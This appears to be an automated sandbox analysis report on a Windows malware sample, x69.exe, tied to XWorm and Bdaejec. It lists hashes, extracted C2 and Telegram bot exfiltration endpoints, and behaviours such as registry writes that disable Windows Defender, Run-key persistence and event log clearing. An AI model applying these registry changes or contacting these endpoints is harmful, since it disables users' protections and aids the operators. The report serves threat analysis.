Resubmissions
22/05/2025, 12:12
250522-pc961stjt7 1022/05/2025, 12:11
250522-pcnysatjt2 1020/05/2025, 04:12
250520-eskwysbl9t 10Analysis
-
max time kernel
870s -
max time network
870s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250425-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250425-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
20/05/2025, 04:12
Static task
static1
Behavioral task
behavioral1
Sample
x69.exe
Resource
win10v2004-20250502-en
General
-
Target
x69.exe
-
Size
285KB
-
MD5
20841606ce69632f258221219aeee09b
-
SHA1
b72918797186774598792c47b66d5857be59f576
-
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
-
SHA512
aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e
-
SSDEEP
6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI
Malware Config
Extracted
xworm
3.1
grayhatgroupontop.zapto.org:1177
-
Install_directory
%AppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
bdaejec
ddos.dnsnb8.net
Extracted
gurcu
https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004
Extracted
latentbot
grayhatgroupontop.zapto.org
Signatures
-
Bdaejec family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x00070000000281d0-84.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x00080000000281c7-25.dat family_xworm behavioral2/memory/3640-37-0x0000000000910000-0x0000000000928000-memory.dmp family_xworm -
Detects Bdaejec Backdoor. 5 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral2/memory/1368-150-0x0000000000FB0000-0x0000000000FB9000-memory.dmp family_bdaejec_backdoor behavioral2/memory/4008-680-0x0000000000E70000-0x0000000000E79000-memory.dmp family_bdaejec_backdoor behavioral2/memory/1368-835-0x0000000000FB0000-0x0000000000FB9000-memory.dmp family_bdaejec_backdoor behavioral2/memory/4008-3010-0x0000000000E70000-0x0000000000E79000-memory.dmp family_bdaejec_backdoor behavioral2/memory/1368-3104-0x0000000000FB0000-0x0000000000FB9000-memory.dmp family_bdaejec_backdoor -
Gurcu family
-
Latentbot family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 5464 created 612 5464 powershell.EXE 5 PID 4284 created 612 4284 powershell.EXE 5 -
Xworm family
-
pid Process 6340 powershell.exe 6664 powershell.exe 568 powershell.exe 6608 powershell.exe 1784 powershell.exe 1760 powershell.exe 6224 powershell.exe 7120 powershell.exe 1984 powershell.exe 1440 powershell.exe 1844 powershell.exe 2400 powershell.exe 2092 powershell.exe 1252 powershell.exe 4284 powershell.EXE 376 powershell.exe 556 powershell.exe 5680 powershell.exe 5072 powershell.exe 232 powershell.exe 5300 powershell.exe 4124 powershell.exe 4896 powershell.exe 3124 powershell.exe 5928 powershell.exe 4164 powershell.exe 524 powershell.exe 2140 powershell.exe 5060 powershell.exe 5160 powershell.exe 7136 powershell.exe 5548 powershell.exe 6668 powershell.exe 1656 powershell.exe 6712 powershell.exe 4456 powershell.exe 5416 powershell.exe 5464 powershell.EXE 5472 powershell.exe 5252 powershell.exe 5712 powershell.exe 5872 powershell.exe 2692 powershell.exe 2492 powershell.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 6808 netsh.exe 4492 netsh.exe -
resource yara_rule behavioral2/files/0x00070000000281cc-73.dat aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69Disable-winDefender.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation x69.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation firefox.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation izTLZKj.exe Key value queried \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\International\Geo\Nation iyMbXS.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk x69.exe -
Executes dropped EXE 35 IoCs
pid Process 3640 x69.exe 1332 x69.exe 3192 x69Disable-winDefender.exe 2368 x69Disable-winDefender.exe 4008 izTLZKj.exe 1568 x69install.exe 1368 iyMbXS.exe 1140 x69install.exe 4676 firefox.exe 3188 firefox.exe 2312 firefox.exe 3900 firefox.exe 5628 firefox.exe 6048 firefox.exe 4800 firefox.exe 6348 firefox.exe 6692 firefox.exe 6704 firefox.exe 6728 firefox.exe 4324 x69.exe 6744 firefox.exe 3288 tcpview64.exe 5756 x69.exe 6972 x69.exe 7064 x69.exe 1816 x69.exe 3192 x69.exe 1052 x69.exe 2860 x69.exe 5684 x69.exe 460 x69.exe 4768 x69.exe 6076 x69.exe 5512 x69.exe 2584 x69.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" x69.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" x69.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA firefox.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5464 set thread context of 420 5464 powershell.EXE 248 PID 4284 set thread context of 5312 4284 powershell.EXE 249 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE iyMbXS.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\java.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\7z.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\pack200.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\protocolhandler.exe iyMbXS.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstat.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoia.exe iyMbXS.exe File opened for modification C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe iyMbXS.exe File opened for modification C:\Program Files\Windows Defender\NisSrv.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe izTLZKj.exe File opened for modification C:\Program Files\Mozilla Firefox\nmhproxy.exe iyMbXS.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe izTLZKj.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\java.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jjs.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\orbd.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe iyMbXS.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe iyMbXS.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe izTLZKj.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe izTLZKj.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE izTLZKj.exe File opened for modification C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\disabledupdater.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe iyMbXS.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\os_update_handler.exe izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE izTLZKj.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE iyMbXS.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\VPREVIEW.EXE izTLZKj.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE izTLZKj.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe izTLZKj.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe izTLZKj.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69Disable-winDefender.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language izTLZKj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iyMbXS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x69install.exe -
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tcpview64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz tcpview64.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Control Panel\Colors firefox.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
